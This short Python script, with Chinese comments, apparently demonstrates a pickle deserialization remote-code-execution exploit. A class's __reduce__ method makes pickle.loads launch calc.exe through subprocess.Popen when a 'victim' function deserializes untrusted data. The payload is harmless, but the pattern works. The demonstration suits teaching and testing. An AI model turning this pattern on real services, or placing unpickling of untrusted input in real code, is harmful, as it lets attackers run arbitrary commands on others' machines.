import pickle
import subprocess


class RCE:
    def __reduce__(self):
        # 返回一个可调用对象和参数元组
        return (subprocess.Popen, (['calc.exe'],))  # Windows 计算器

# 生成恶意载荷
payload = pickle.dumps(RCE())

# 受害者代码 - 反序列化不可信数据
def vulnerable_function(data):
    return pickle.loads(data)  # 漏洞触发点！

# 触发漏洞
vulnerable_function(payload)